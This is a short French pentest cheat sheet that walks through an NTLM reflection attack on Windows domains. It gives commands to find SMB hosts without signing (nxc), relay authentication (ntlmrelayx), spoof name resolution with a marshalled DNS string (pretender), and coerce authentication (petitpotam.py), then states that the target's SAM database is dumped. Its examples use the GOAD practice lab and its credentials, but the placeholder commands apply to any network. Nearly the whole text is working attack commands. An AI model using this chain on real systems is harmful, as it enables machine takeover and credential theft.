NTLM Reflection
Récupération des serveurs n’imposant pas la signature SMB
nxc smb <RANGE_IP>
Relaying vers une de ces machines
ntlmrelayx -t <TARGET_FQDN> -smb2support
En prenant l’exemple de GOAD, la commande serait :
ntlmrelayx -t CASTELBLACK.NORTH.SEVENKINGDOMS.LOCAL -smb2support
Spoofing
pretender -i <INTERFACE> --no-dhcp-dns --no-timestamps --spoof '*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA*'
Coerce
petitpotam.py [-d <DOMAIN>] -u <USERNAME> -p <PASSWORD> '<SERVER_NAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <TARGET_IP>
En prenant l’exemple de GOAD, la commande serait :
petitpotam.py -d "NORTH.SEVENKINGDOMS.LOCAL" -u "robb.stark" -p "sexywolfy" 'CASTELBLACK1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 192.168.56.22
Il est aussi possible d’utiliser localhost à la place du nom du serveur :
petitpotam.py [-d <DOMAIN>] -u <USERNAME> -p <PASSWORD> 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <TARGET_IP>
D’autres tools que petitpotam peuvent être utilisés (nxc, coercer…)
Compromission de la machines
La base SAM de la machine ciblée sera dump.